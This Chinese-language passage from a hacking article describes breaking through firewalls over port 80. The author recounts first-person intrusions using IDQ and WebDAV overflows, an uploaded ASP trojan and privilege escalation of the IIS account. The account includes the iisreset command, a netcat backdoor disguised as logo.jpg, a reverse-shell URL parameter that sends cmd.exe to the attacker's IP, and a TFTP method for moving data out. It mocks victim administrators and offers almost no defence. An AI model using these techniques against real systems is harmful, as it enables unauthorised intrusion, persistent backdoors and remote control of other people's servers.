二、突破防火墙：

    防火墙从外面很难突破，就好像一座森严的壁垒，只有使用一些渗透的手段或者其他的一些方式从内部突破，才能真正达到突破防火墙的目的。

    有很多渗透攻击的例子，我不能一一列举，事实上我也曾经成功的测试过一些站点，从80端口的渗透攻击是比较常见的，有的是使用溢出攻击、有的是利用页面程序的缺陷进行攻击。

    突破防火墙是从内部开始的，但是也要先找到一些可以渗透的端口才可以。我前一段写了一篇文章是记录一次渗透攻击的。我是利用ASP页面身份验证里的一个漏洞成功拿到了一个页面管理的权限，实现了一些上传的功能，并从80端口对该主机进行渗透并获得最高权限的。

    TFTP方法事实上就是一种从内部突破防火墙的方法，由于69端口是系统默认可以使用的TFTP服务端口，所以在Shell中提交一个TFTP传输的申请，防火墙是不会拒绝的。这样，我们就可以将一些有价值的东西传送到我们希望它存在的地方。 从80端口突破防火墙是比较常见且比较容易实现的，因为80的访问一般不会被禁止。我曾经做过两次不同的方式但原理相同的突破。使用IDQ溢出得到Shell将ASP木马上传到WWW服务的某个目录下，然后将IUSR_Computername这一IIS访问进程账号加为管理员组成员。随后我将它的IIS服务重新启动

    C:\winnt\system32>iisreset

    从新回到浏览器中，打开ASP木马查看net session可以，所以证明刚才我所做的一切都有效果了，这样我就在80端口上建立了一个很高权限（Administrators）的Shell。实现了对防火墙的突破。

    另外一次是最近的事情，我使用WebDAV对某一主机进行溢出之后，得到system权限，将IIS访问进程账号加为管理员组，上传nc.exe到scripts目录下面并将名称改为logo.jpg，呵呵！由于我没有能够重新启动IIS服务，所以只有等待……第二天我看了看，IIS已经重新启动，而nc也还在，真受不了这样的管理员。FAINT！好了，其实后门就已经架设完成了。在本地命令行输入如下：

    E:\>nc.exe –l –p 888 –vv 等待一个连接。

    在浏览器里面输入如下：

    ?-e+c:\winnt\system32\cmd.exe+192.168.0.3+888

    注：192.168.0.3是我的IP地址。

    连接成功，我得到的又是admin的权限，看来那为管理员是重新启动了主机……

    防范ASP木马的文章很多，我就不再介绍。对于脚本执行权限的问题，我想只要你会配置IIS就应该不会成问题吧！
上面只是针对80端口渗透突破防火墙的一些思路，事实上还有很多可以实现的突破，例如小叮当那个动画里面利用80端口和PCAnyWhere结合进行的渗透就是非常好的例子。